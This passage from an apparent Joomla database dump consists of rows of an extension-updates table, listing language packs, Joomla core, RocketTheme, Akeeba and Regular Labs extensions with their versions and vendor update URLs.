'),(13111,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13112,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13113,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13114,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13115,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13116,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13117,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13118,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13119,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13120,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13121,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13122,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13123,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13124,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13125,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13126,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13127,3,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13128,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13129,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13130,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13131,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13132,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13133,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13134,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13135,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13136,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13137,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13138,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13139,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13140,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13141,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13142,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13143,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13144,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13145,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13146,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13147,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13148,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13149,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13150,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13151,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13152,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(13153,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(13154,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(13155,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(13156,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(13157,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(13158,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(13159,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13160,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13161,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13162,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13163,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13164,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13165,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13166,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13167,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13168,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13169,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13170,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13171,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13172,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13173,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13174,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13175,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13176,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13177,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13178,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13179,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13180,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13181,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13182,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13183,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13184,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13185,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13186,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13187,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13188,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13189,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13190,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13191,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13192,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13193,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13194,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13195,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13196,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13197,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13198,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13199,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13200,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13201,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13202,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13203,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13204,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13205,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13206,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13207,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(13208,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(13209,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(13210,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13211,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13212,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(13213,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13214,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13215,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13216,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13217,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-0.html\n				',''),(13218,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13219,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13220,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13221,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13222,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-0.html\n				',''),(13223,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13224,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13225,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13226,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13227,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-0.html\n				',''),(13228,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13229,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13230,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13231,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13232,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13233,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13234,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13235,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13236,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13237,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13238,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13239,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13240,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13241,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13242,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13243,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13244,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13245,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13246,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13247,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13248,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13249,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13250,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13251,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13252,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13253,3,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13254,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13255,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13256,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13257,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13258,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13259,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13260,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13261,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13262,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13263,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13264,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13265,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13266,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13267,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13268,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13269,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13270,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13271,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13272,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13273,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13274,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13275,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13276,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13277,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13278,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(13279,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(13280,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(13281,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(13282,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(13283,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(13284,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(13285,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13286,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13287,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13288,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13289,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13290,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13291,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13292,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13293,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13294,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13295,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13296,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13297,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13298,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13299,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13300,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13301,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13302,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13303,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13304,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13305,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13306,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13307,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13308,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13309,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13310,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13311,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13312,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13313,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13314,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13315,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13316,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13317,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13318,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13319,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13320,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13321,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13322,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13323,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13324,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13325,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13326,57,0,'Spanish 